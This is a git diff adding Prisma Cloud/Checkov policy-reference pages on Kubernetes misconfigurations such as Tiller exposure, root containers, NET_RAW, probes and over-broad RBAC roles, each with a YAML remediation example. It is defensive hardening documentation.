+|=== +|Prisma Cloud Policy ID +| ecab4931-c3df-4c60-97b2-70b111f0565f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py[CKV_K8S_45] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +Tiller (Helm v2) is the in-cluster component of Helm. +It interacts directly with the Kubernetes API server to install, upgrade, query, and remove Kubernetes resources. +It also stores the objects that represent releases. +Its permissive configuration could grant the users a broad range of permissions. +Helm v3 removes Tiller, and it is recommended that you upgrade: see link:doc:bc_k8s_32[Ensure Tiller (Helm V2) Is Not Deployed]. +However, this is not always feasible. +Restricting access to Tiller from within the cluster limits the abilities of a compromised pod or anonymous user in the cluster. + +//// +=== Fix - Runtime + + +* CLI Command* + + +s + + +[source,shell] +---- +{ + "kubectl -n kube-system patch deployment tiller-deploy --patch ' +spec: + template: + spec: + containers: + - name: tiller + ports: [] + args: ["--listen=localhost:44134"] +'", +} +---- + +//// + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container + + +[source,yaml] +---- +{ + "apiVersion: apps/v1 +kind: Deployment +metadata: + name: tiller + labels: + app: tiller +spec: + progressDeadlineSeconds: 600 + replicas: 1 + revisionHistoryLimit: 10 + selector: + matchLabels: + app: helm + name: tiller + template: + metadata: + creationTimestamp: null + labels: + app: helm + name: tiller + spec: + automountServiceAccountToken: true + containers: ++ - args: ++ - --listen=localhost:44134 + env: + - name: TILLER_NAMESPACE + value: kube-system + - name: TILLER_HISTORY_MAX + value: "0" + image: gcr.io/kubernetes-helm/tiller:v2.16.9 + name: tiller +- ports: +- - containerPort: 44134 +- name: tiller +- protocol: TCP +- - containerPort: 44135 +- name: http +- protocol: TCP", +} +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-41.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-41.adoc new file mode 100644 index 000000000..61882574d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-41.adoc @@ -0,0 +1,83 @@ +== Tiller (Helm v2) service is not deleted +// Tiller (Helm v2) service not deleted + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 110b3674-1362-4d59-a721-5233965bb73d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/TillerService.py[CKV_K8S_44] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Tiller (Helm v2) is the in-cluster component of Helm. +It interacts directly with the Kubernetes API server to install, upgrade, query, and remove Kubernetes resources. +It also stores the objects that represent releases. +Its permissive configuration could grant the users a broad range of permissions. +Helm v3 removes Tiller, and it is recommended that you upgrade: see link:doc:bc_k8s_32[Ensure Tiller (Helm V2) Is Not Deployed]. +However, this is not always feasible. +Restricting access to Tiller from within the cluster limits the abilities of a compromised pod or anonymous user in the cluster. +After link:doc:bc_k8s_40[restricting connectivity to the Tiller deployment], the Tiller service can be deleted. + +//// +=== Fix - Runtime + + +* CLI Command* + + +s +`kubectl -n kube-system delete service tiller-deploy` +//// + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Service + + +[source,yaml] +---- +{ + "-- apiVersion: v1 +- kind: Service +- metadata: +- labels: +- app: helm +- name: tiller +- name: tiller-deploy +- namespace: kube-system +- spec: +- ports: +- - name: tiller +- port: 44134 +- protocol: TCP +- targetPort: tiller +- selector: +- app: helm +- name: tiller +- type: ClusterIP", +} +---- +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-5.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-5.adoc new file mode 100644 index 000000000..29d48f9ae --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-5.adoc @@ -0,0 +1,108 @@ +== Root containers admitted +// Root containers allowed + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b7323f51-842c-4c36-8e16-d0ef3d6c3be4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py[CKV_K8S_6] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, a container's user ID table maps to the host's user table. +Running a process as the root user inside a container runs it as root on the host. +Many container images use the root user to run PID 1. +If PID 1 is compromised, an attacker has root permissions in the container, and any misconfigurations can be exploited. +Containers that run as root frequently have more permissions than their workload requires which, in case of compromise, could help an attacker further their exploits. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* runAsUser:rule:MustRunAsNonRoot - Unable containers to run with root privileges. +runAsUser:rule:MustRunAs - When the minimum range is set to 1 or higher, containers cannot run as root. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: + runAsUser: ++ rule: 'MustRunAsNonRoot' +or + rule: 'MustRunAs' + ranges: ++ - min: + max: +---- + + +To use a **PodSecurityPolicy** resource, the requesting user or target pod's service account must be authorized to use the policy. + +The preferred method is to grant access to the service account. + +In the following example we use **RBAC**, a standard Kubernetes authorization mode. + +A *Role* or *ClusterRole* needs to grant access to *use* the desired policies. + +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- +The **ClusterRole** is bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-6.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-6.adoc new file mode 100644 index 000000000..e75e6e046 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-6.adoc @@ -0,0 +1,100 @@ +== Containers with NET_RAW capability admitted +// Containers with NET_RAW capability allowed + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 11c377f1-a61c-4f70-be29-b09b6bf3c12e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py[CKV_K8S_7] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +NET_RAW is a default permissive setting in Kubernetes allowing ICMP traffic between containers and grants an application the ability to craft raw packets. +In the hands of an attacker NET_RAW can enable a wide variety of networking exploits from within the cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* PodSecurityPolicy +* *Arguments:* requiredDropCapabilities (Optional) Defines the capabilities which must be dropped from containers. + +These capabilities are removed from the default set, and must not be added. +NET_RAW capability is removed when the field includes it specifically, or when it includes *ALL*. + + +[source,yaml] +---- +apiVersion: policy/v1beta1 +kind: PodSecurityPolicy +metadata: + name: +spec: + requiredDropCapabilities: ++ -ALL +or ++ -NET_RAW +---- + + +To use a *PodSecurityPolicy* resource, the requesting user or target pod’s service account must be authorized to use the policy. The preferred method is to grant access to the service account. In the following example we use *RBAC*, a standard Kubernetes authorization mode. + +First, a *Role* or *ClusterRole* needs to grant access to use the desired policies. + +*Kind*: ClusterRole + + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: +rules: +- apiGroups: ['policy'] + resources: ['podsecuritypolicies'] + verbs: ['use'] + resourceNames: + - +---- + +The *ClusterRole* is then bound to the authorized service(s): + +*Kind*: ClusterRoleBinding + +[source,yaml] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +roleRef: + kind: ClusterRole + name: + apiGroup: rbac.authorization.k8s.io +subjects: +- kind: ServiceAccount + name: + namespace: +---- \ No newline at end of file diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-7.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-7.adoc new file mode 100644 index 000000000..42d714eb1 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-7.adoc @@ -0,0 +1,58 @@ +== Liveness probe is not configured +// Liveness probe not configured + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0ac8c8e1-3382-43da-90bb-9d4b5b54a624 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py[CKV_K8S_8] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The kubelet uses liveness probes to know when to schedule restarts for containers. +Restarting a container in a deadlock state can help to make the application more available, despite bugs. +If a container is unresponsive, either to a deadlocked application or a multi-threading defect, restarting the container can make the application more available, despite the defect. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Field:* livenessProbe (Optional) The probe describes a health check to be performed against a container to determine whether it is alive or not. +Its arguments may include: exec, failureThreshold, httpGet, initialDelaySeconds, periodSeconds, successThreshold, tcpSocket and timeoutSeconds. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: ++ livenessProbe: + +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-8.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-8.adoc new file mode 100644 index 000000000..c52ae6ee5 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-8.adoc @@ -0,0 +1,61 @@ +== Readiness probe is not configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b5b36b9a-68f5-4825-9d1b-bcd3dcea2141 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py[CKV_K8S_9] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +Readiness Probe is a Kubernetes capability that enables teams to make their applications more reliable and robust. +This probe regulates under what circumstances the pod should be taken out of the list of service endpoints so that it no longer responds to requests. +In defined circumstances the probe can remove the pod from the list of available service endpoints. +Using the Readiness Probe ensures teams define what actions need to be taken to prevent failure and ensure recovery in case of unexpected errors. +https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/[Kubernetes.io Documentation] + +=== Fix - Buildtime + + +*Kubernetes* + +*Resource*: Container +*Field:* readinessProbe (Optional) + +The probe describes a health check to be performed against a container to determine whether it is ready for traffic or not. +Its configurations may include: exec, failureThreshold, httpGet, initialDelaySeconds, periodSeconds, successThreshold, tcpSocket and timeoutSeconds. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: ++ readinessProbe: + +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-9.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-9.adoc new file mode 100644 index 000000000..cdd443f14 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-9.adoc @@ -0,0 +1,61 @@ +== CPU request is not set +// CPU request not set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 662c96ca-8714-4f6f-bf63-9277daafc075 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/CPURequests.py[CKV_K8S_10] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +When specifying the resource request for containers in a pod, the scheduler uses this information to decide which node to place the pod on. +When setting resource limit for a container, the kubelet enforces those limits so that the running container is not allowed to use more of that resource than the limit you set. +If a container is created in a namespace that has a default CPU limit, and the container does not specify its own CPU limit, then the container is assigned the default CPU limit. +Kubernetes assigns a default CPU request under certain conditions. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* resources:requests:cpu (Optional) + +Defines the CPU request size for the container. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + resources: + requests: ++ cpu: +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-p3d-3.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-p3d-3.adoc new file mode 100644 index 000000000..e69de29bb diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-p3d-6.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-p3d-6.adoc new file mode 100644 index 000000000..e69de29bb diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-control-over-validating-or-mutating-admission-webhook-configurations-are-minimized.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-control-over-validating-or-mutating-admission-webhook-configurations-are-minimized.adoc new file mode 100644 index 000000000..2c0a254e1 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-control-over-validating-or-mutating-admission-webhook-configurations-are-minimized.adoc @@ -0,0 +1,62 @@ +== Kubernetes ClusterRoles that grant control over validating or mutating admission webhook configurations are not minimized +// Kubernetes ClusterRoles that grant control over validating or mutating admission webhook configurations not minimized + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8657200c-106e-4815-9572-b722474d1353 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py[CKV_K8S_155] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +ClusterRoles that grant write permissions over admission webhook should be minimized to reduce powerful identities in the cluster. +Validating admission webhooks can read every object admitted to the cluster, while mutating admission webhooks can read and mutate every object admitted to the cluster. +As such, ClusterRoles that grant control over admission webhooks are granting near cluster admin privileges. +Minimize such ClusterRoles to limit the number of powerful credentials that if compromised could take over the entire cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind*: ClusterRole +* *Arguments:* rules ClusterRoles that grant the "create", "update" or "patch" verbs over the "mutatingwebhookconfigurations" or "validatingwebhookconfigurations" resources in the "admissionregistration.k8s.io" API group are granting control over admission webhooks. + + +[source,yaml] +---- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: +rules: +- apiGroups: [""] + resources: ["pods"] + verbs: ["get"] +- apiGroups: ["admissionregistration.k8s.io"] + resources: ["mutatingwebhookconfigurations"] + verbs: + - list +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-permissions-to-approve-certificatesigningrequests-are-minimized.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-permissions-to-approve-certificatesigningrequests-are-minimized.adoc new file mode 100644 index 000000000..89d6e0c4d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-clusterroles-that-grant-permissions-to-approve-certificatesigningrequests-are-minimized.adoc @@ -0,0 +1,62 @@ +== Kubernetes ClusterRoles that grant permissions to approve CertificateSigningRequests are not minimized +// Kubernetes ClusterRoles that grant permissions to approve CertificateSigningRequests not minimized + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a94ddca0-7fbe-40ea-8a87-ce6c6c377c9f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py[CKV_K8S_156] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +ClusterRoles that grant permissions to approve CertificateSigningRequests should be minimized to reduce powerful identities in the cluster. +Approving CertificateSigningRequests allows one to issue new credentials for any user or group. +As such, ClusterRoles that grant permissions to approve CertificateSigningRequests are granting cluster admin privileges. +Minimize such ClusterRoles to limit the number of powerful credentials that if compromised could take over the entire cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind*: ClusterRole +* *Arguments:* rules ClusterRoles that grant the "update" verbs over the "certificatesigningrequests/approval" and the "approve" verb over "signers" in the "certificates.k8s.io" API group are granting permissions to approve CertificateSigningRequests + + +[source,yaml] +---- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: +rules: +- apiGroups: ["certificates.k8s.io"] + resources: ["certificatesigningrequests"] + verbs: ["get", "list", "create] +x- apiGroups: ["certificates.k8s.io"] +x resources: ["certificatesigningrequests/approval"] +x verbs: ["update"] +x- apiGroups: ["certificates.k8s.io"] +x resources: ["signers"] +x verbs: ["approve"] +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-containers-do-not-run-with-allowprivilegeescalation.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-containers-do-not-run-with-allowprivilegeescalation.adoc new file mode 100644 index 000000000..a723388e7 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-containers-do-not-run-with-allowprivilegeescalation.adoc @@ -0,0 +1,59 @@ +== Containers run with AllowPrivilegeEscalation based on Pod Security Policy setting + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 59392ccc-c1a5-4a18-bd29-3513b263535d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py[CKV_K8S_5] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +The *AllowPrivilegeEscalation* Pod Security Policy controls whether or not a user is allowed to set the security context of a container to *True*. +Setting it to *False* ensures that no child process of a container can gain more privileges than its parent. +We recommend you to set *AllowPrivilegeEscalation* to *False*, to ensure *RunAsUser* commands cannot bypass their existing sets of permissions. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container +* *Arguments:* allowPrivilegeEscalation (Optional) If false, the pod can not request to allow privilege escalation. +Default to true. + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: + securityContext: ++ allowPrivilegeEscalation: false +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-default-service-accounts-are-not-actively-used.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-default-service-accounts-are-not-actively-used.adoc new file mode 100644 index 000000000..09466759d --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-default-service-accounts-are-not-actively-used.adoc @@ -0,0 +1,97 @@ +== Default Kubernetes service accounts are actively used by bounding to a role or cluster role +// Default Kubernetes service accounts actively used by bounding to a role or cluster role + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 58cc757b-ff58-4c84-8c47-29651b27176f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py[CKV_K8S_42] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + +Default Kubernetes service accounts are actively used by bounding to a role or cluster role + + +=== Description + + +Every Kubernetes installation has a service account called _default_ that is associated with every running pod. +Similarly, to enable pods to make calls to the internal API Server endpoint, there is a *ClusterIP* service called _Kubernetes_. +This combination makes it possible for internal processes to call the API endpoint. +We recommend that users create their own user-managed service accounts and grant the appropriate roles to each service account. + +=== Fix - Buildtime + + +*Kubernetes* + + + + +*Option 1* + + +* *Resource:* ServiceAccount +* *Arguments:* If service name is set to default, *automountServiceAccountToken* should be set to false in order to opt out of automounting API credentials for a service account. + + +[source,default service] +---- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: default ++ automountServiceAccountToken: false +---- + +[source,non-default service] +---- +apiVersion: v1 +kind: ServiceAccount +metadata: ++ name: +---- + +*Option 2* + + +* *Resource:* RoleBinding / ClusterRoleBinding +* *Arguments:* *RoleBinding* grants the permissions defined in a role to a user or set of users within a specific namespace. +*ClusterRoleBinding* grants that access cluster-wide. To avoid activating the default service account, it should not be used as a subject in *RoleBinding* or *ClusterRoleBinding* resources. + + +[source,RoleBinding] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: +subjects: +-- kind: ServiceAccount +- name: default +---- + +[source,ClusterRoleBinding] +---- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: +subjects: +-- kind: ServiceAccount +- name: default +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-minimized-wildcard-use-in-roles-and-clusterroles.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-minimized-wildcard-use-in-roles-and-clusterroles.adoc new file mode 100644 index 000000000..d0de25bbc --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-minimized-wildcard-use-in-roles-and-clusterroles.adoc @@ -0,0 +1,62 @@ +== Wildcard use is not minimized in Roles and ClusterRoles +// Wildcard use not minimized in Roles and ClusterRoles + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1abd7f34-5d4d-4542-bb95-414857c82c3e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py[CKV_K8S_49] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +In Kubernetes, roles and ClusterRoles are used to define the permissions that are granted to users, service accounts, and other entities in the cluster. +Roles are namespaced and apply to a specific namespace, while ClusterRoles are cluster-wide and apply to the entire cluster. +When you define a role or ClusterRole, you can use wildcards to specify the resources and verbs that the role applies to. +For example, you might specify a role that allows users to perform all actions on all resources in a namespace by using the wildcard "*" for the resources and verbs. +However, using wildcards can be a security risk because it grants broad permissions that may not be necessary for a specific role. +If a role has too many permissions, it could potentially be abused by an attacker or compromised user to gain unauthorized access to resources in the cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + + + +[source,go] +---- +{ + "resource "kubernetes_cluster_role" "pass" { + metadata { + name = "terraform-example" + } + + + rule { + api_groups = [""] + resources = ["namespaces", "pods"] + verbs = ["get", "list", "watch"] + }", + +} +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-bind-rolebindings-or-clusterrolebindings-are-minimized.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-bind-rolebindings-or-clusterrolebindings-are-minimized.adoc new file mode 100644 index 000000000..cb7044cf4 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-bind-rolebindings-or-clusterrolebindings-are-minimized.adoc @@ -0,0 +1,60 @@ +== Kubernetes Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings are not minimized +// Kubernetes Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings not minimized + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 26540a95-91c4-41fb-bbdf-a1521991149e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py[CKV_K8S_157] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Role or ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings should be minimized to reduce powerful identities in the cluster. +Such Roles and ClusterRoles can attach existing permissions (Roles and ClusterRoles) to arbitrary identities. +RoleBindings grant permissions over a namespace, while ClusterRoleBindings grant permissions over the entire cluster. +Minimize such Roles and ClusterRoles to limit the number of powerful credentials that if compromised could escalate privileges and possibly take over the entire cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind*: ClusterRole, Role +* *Arguments:* rules ClusterRoles and Roles that grant the "bind" verbs over "clusterrolebindings" or "rolebindings" in the "rbac.authorization.k8s.io" API group should be minimized. + + +[source,yaml] +---- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: +rules: +- apiGroups: ["rbac.authorization.k8s.io"] + resources: ["roles", "clusterroles"] + verbs: ["get", "list", "create", "update"] +x- apiGroups: ["rbac.authorization.k8s.io"] +x resources: ["clusterrolebindings"] +x verbs: ["bind"] +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-escalate-roles-or-clusterrole-are-minimized.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-escalate-roles-or-clusterrole-are-minimized.adoc new file mode 100644 index 000000000..b372e93b0 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-roles-and-clusterroles-that-grant-permissions-to-escalate-roles-or-clusterrole-are-minimized.adoc @@ -0,0 +1,59 @@ +== Kubernetes Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRole are not minimized +// Kubernetes Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRole not minimized + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c88cc0a0-2670-460c-9420-bacf24ee91ae + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py[CKV_K8S_158] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Role or ClusterRoles that grant permissions to escalate Roles or ClusterRoles should be minimized to reduce powerful identities in the cluster. +Such Roles and ClusterRoles can add arbitrary permissions to arbitrary identities. +Escalating Roles can add permissions over a namespace, while escalating ClusterRoles can add permissions over the entire cluster. +Minimize such Roles and ClusterRoles to limit the number of powerful credentials that if compromised could escalate privileges and possibly take over the entire cluster. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind*: ClusterRole, Role +* *Arguments:* rules ClusterRoles and Roles that grant the "escalate" verbs over "clusterroles" or "roles" in the "rbac.authorization.k8s.io" API group should be minimized. + + +[source,yaml] +---- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: +rules: +- apiGroups: ["rbac.authorization.k8s.io"] + resources: ["roles", "clusterrolebindings"] + verbs: ["get", "list", "create", "update"] +x- apiGroups: ["rbac.authorization.k8s.io"] +x resources: ["clusterroles"] +x verbs: ["escalate"] +---- diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-securitycontext-is-applied-to-pods-and-containers.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-securitycontext-is-applied-to-pods-and-containers.adoc new file mode 100644 index 000000000..8622ba876 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-securitycontext-is-applied-to-pods-and-containers.adoc @@ -0,0 +1,94 @@ +== securityContext is not applied to pods and containers +// securityContext not applied to pods and containers + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9cc81c69-dc64-48fc-ad1f-d9c07ff85051 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py[CKV_K8S_29] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Terraform, Helm, Kustomize + +|=== + + + +=== Description + + +*securityContext* defines privilege and access control settings for your pod or container, and holds security configurations that will be applied to a container. +Some fields are present in both *securityContext* and *PodSecurityContext*, when both are set, *securityContext* takes precedence. +Well-defined privilege and access control settings will enhance assurance that your pod is running with the properties it requires to function. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Resource:* Container / Pod / Deployment / DaemonSet / StatefulSet / ReplicaSet / ReplicationController / Job / CronJob +* *Arguments:* securityContext (Optional) A field that defines privilege and access control settings for your Pod or Container. + + +[source,container] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: + containers: + - name: + image: ++ securityContext: +---- + +[source,pod] +---- +apiVersion: v1 +kind: Pod +metadata: + name: +spec: ++ securityContext: +---- + +[source,cronjob] +---- +apiVersion: batch/v1beta1 +kind: CronJob +metadata: + name: +spec: + schedule: <> + jobTemplate: + spec: + template: + spec: ++ securityContext: +---- + +[source,text] +---- +apiVersion: <> 